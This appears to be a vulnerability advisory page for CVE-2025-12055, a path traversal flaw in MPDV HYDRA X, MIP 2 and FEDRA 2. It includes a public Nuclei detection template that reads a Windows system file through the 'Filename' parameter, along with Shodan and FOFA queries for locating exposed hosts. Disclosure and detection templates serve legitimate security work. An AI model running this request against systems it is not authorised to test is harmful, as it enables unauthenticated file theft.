CVE-2025-12055: MPDV Mikrolab GmbH HYDRA X, MIP 2 & FEDRA 2 - Path Traversal

日期: 2025-11-21 | 影响软件: MPDV Mikrolab GmbH HYDRA X, MIP 2 & FEDRA 2 | POC: 已公开

漏洞描述

MPDV Mikrolab GmbH HYDRA X, MIP 2, and FEDRA 2 <= Maintenance Pack 36 with Servicepack 8 (week 36/2025) contain an unauthenticated local file disclosure vulnerability caused by improper validation of the "Filename" parameter in the public $SCHEMAS$ resource, letting attackers read arbitrary Windows OS files, exploit requires local access.

PoC代码[已公开]

id: CVE-2025-12055

info:
  name: MPDV Mikrolab GmbH HYDRA X, MIP 2 & FEDRA 2 - Path Traversal
  author: theamanrawat
  severity: high
  description: |
    MPDV Mikrolab GmbH HYDRA X, MIP 2, and FEDRA 2 <= Maintenance Pack 36 with Servicepack 8 (week 36/2025) contain an unauthenticated local file disclosure vulnerability caused by improper validation of the "Filename" parameter in the public $SCHEMAS$ resource, letting attackers read arbitrary Windows OS files, exploit requires local access.
  impact: |
    Attackers can read arbitrary files on the Windows operating system, potentially exposing sensitive information.
  remediation: |
    Update to Maintenance Pack 36 with Servicepack 8 (week 36/2025) or later.
  reference:
    - https://seclists.org/fulldisclosure/2025/Oct/28
    - https://nvd.nist.gov/vuln/detail/CVE-2025-12055
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-12055
    epss-score: 0.00107
    epss-percentile: 0.24602
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"MPDV"
    fofa-query: body="MPDV"
  tags: cve,cve2025,lfi,mpdv,mikrolab

http:
  - method: GET
    path:
      - "{{BaseURL}}/hx/resources/public/$SCHEMAS$?Filename=c%3a%5cwindows%5cwin.ini"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "bit app support", "fonts", "extensions")'
          - 'contains(content_type, "application/octet-stream")'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022059cc6b2fd1814025786c1dd72dd45a9b0228feb3d5459b3790dca9f56a7e508302204202b1bb81abe43d40e05ecb0bfd2f9d2e26d67b6874ae302a4025b4af1feab0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐